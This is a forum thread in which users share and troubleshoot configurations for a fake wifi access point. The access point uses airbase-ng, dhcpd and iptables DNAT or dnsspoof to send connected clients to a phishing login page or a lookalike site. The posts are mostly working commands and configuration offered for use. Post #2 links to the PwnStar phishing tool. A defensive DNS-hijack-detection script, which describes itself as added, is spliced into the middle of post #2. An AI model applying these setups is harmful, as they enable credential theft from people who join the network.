Thread: Fake AP Redirect Issue.

  1. #1
    Join Date
    2013-Mar
    Posts
    2

    Fake AP Redirect Issue.

    I am trying to set up a fake AP using my WLAN which, when connected to, causes all browsers to redirect to my Apache server, where a fake login page is set up.

    I've been struggling for a few days trying to set this up. I've now got to the stage where I can successfully create an AP using airbase and then have other clients connect to it and be given an IP address, using dhcpd3-server, not the isc-dhcp-server.

    On my machine there are two interfaces: eth1, which is connected to my LAN, and wlan0. I do not want any connected clients to have access to the internet via eth1; I only want redirection to the local Apache httpd server.

    Below is the contents of my dhcpd.conf file and the two scripts which setup the AP and then configure the machine to handle DHCP requests.
    dhcpd.conf
    Code:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 8.8.8.8;
    range 192.168.2.130 192.168.2.140;
    }
    The script below creates an AP:
    Code:
    airmon-ng check kill 
    airmon-ng start wlan0 7
    airbase-ng -e TESTER -a 6C:4C:A5:2F:6A:D1 -c 7 mon0
    This script sets up the TAP interface, dhcpd, http and mysql daemons. The script executes fine and clients can connect and receive IP addresses, but they will not redirect to my Apache server.
    Code:
    ifconfig at0 up
    ifconfig at0 192.168.2.129 netmask 255.255.255.128
    route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
    touch /var/run/dhcpd.pid
    chmod 777 /var/run/dhcpd.pid
    dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/dhcp3-server start
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    echo 1 > /proc/sys/net/ipv4/ip_forward
    service mysql start
    service apache2 start
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 000.000.00.000:80
    Would anyone know what is causing the problem? I think it's the IPTables commands.

    Thanks for any feedback.

  2. #2
    Join Date
    2013-Jul
    Posts
    844
    Do not think in any way that we are masters of IP tables.

    This is what we used to get PwnStar9.0 to express the index.html phishing page in the target's computer using simple dnsspoof and no internet access provided. We embedded this behind an if statement as required by the program selections in Pwnstar9.0.

    No internet access is provided, therefore only one (1) wifi device is used
    $API=the wifi device
    This relies on dnsspoof
    The phishing pages are stored in the /var/www/ folder
    Set the permissions to allow the pages to read and write and act as a program
    You can adjust to IP as you see fit to your program



    iptables -t nat -A PREROUTING -s 192.168.0.100/24 -p udp --dport 53 -j DNAT --to-destination 127.0.0.1
    iptables -t nat -A PREROUTING -s 192.168.0.100/24 -p tcp --dport 53 -j DNAT --to-destination 127.0.0.1
    iptables --table nat --append POSTROUTING --out-interface $API -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT



    You also might see how we implemented the techdynamics phishing approach into kali-linux using dnsmasq


    Go here and download the program and look at the coding and help files. This approach uses mysql

    http://forum.aircrack-ng.org/index.php/topic,315.0.html


    If you find a solution we would be interested in seeing your work

    We hope this gives you a direction toward a solution.
    MTA
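
From the defending side, the DNS redirection described in post #2 (all port-53 traffic DNATed to a local spoofing resolver) leaves signs a client can check for. This is an added example, not part of the thread or of PwnStar: a Python check over constructed resolver answers, where the hostnames, addresses and function names are assumptions made for illustration.

```python
import ipaddress

# Ranges a public hostname should never resolve to (RFC 1918 plus loopback).
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def is_local(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETS)


def dns_hijack_indicators(answers, canary):
    """Return a list of signs that the network's resolver is spoofing answers.

    answers: hostname -> list of addresses the resolver returned
    canary:  a random hostname that does not exist and must not resolve
    """
    findings = []
    if answers.get(canary):
        findings.append("canary-resolved")
    real = {h: ips for h, ips in answers.items() if h != canary and ips}
    distinct = {ip for ips in real.values() for ip in ips}
    if len(real) >= 3 and len(distinct) == 1:
        findings.append("all-names-same-address")
    for host in sorted(real):
        if any(is_local(ip) for ip in real[host]):
            findings.append("private-answer:" + host)
    return findings


# Constructed sample: every query answered with the access point's own address.
SPOOFED = {
    "www.example.com": ["192.168.0.1"],
    "www.example.net": ["192.168.0.1"],
    "www.example.org": ["192.168.0.1"],
    "k3v9q-canary.example": ["192.168.0.1"],
}
# Constructed sample: distinct documentation-range addresses, canary gets NXDOMAIN.
CLEAN = {
    "www.example.com": ["198.51.100.10"],
    "www.example.net": ["203.0.113.20"],
    "www.example.org": ["198.51.100.30"],
    "k3v9q-canary.example": [],
}

if __name__ == "__main__":
    print(dns_hijack_indicators(SPOOFED, "k3v9q-canary.example"))
    print(dns_hijack_indicators(CLEAN, "k3v9q-canary.example"))
```

In practice the `answers` mapping would be filled from lookups made right after joining a network; a resolved canary or unrelated names collapsing onto one private address is a reason to disconnect before entering credentials anywhere.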

  3. #3
    Join Date
    2014-Dec
    Posts
    1
    Hello community!
    I need some help. I made a FakeAP, and now I need to redirect www.somesite.com to www.somefakesite.com for all connected clients.


    apt-get install dhcp3-server

    dhcpd.conf
    Code:
    authoritative;
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 192.168.1.0  netmask 255.255.255.0 {
    option routers 192.168.1.1;
    option subnet-mask 255.255.255.0;
    
    option domain-name "WIFI";
    option domain-name-servers 192.168.1.1;
    
    range 192.168.1.2 192.168.1.40;
    }

    airmon-ng start wlan0
    Kill all PID
    airbase-ng -c 11 -e WIFI mon0


    Code:
    ifconfig at0 192.168.1.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.65.2
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    
    
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/isc-dhcp-server start
    OK, now I have a working fakeAP. I can connect and surf the internet with connected wireless clients and can capture all traffic with Wireshark.

    But what is the simplest way to redirect all connected clients from www.somesite.com to www.somefakesite.com?
    I tried a few tutorials, but can't make it work. Can you please help me?
    Maybe with a proxy? I tried ettercap too, but as far as I know that's working just on LAN and I need to add all clients manually to the list.

    Thank you
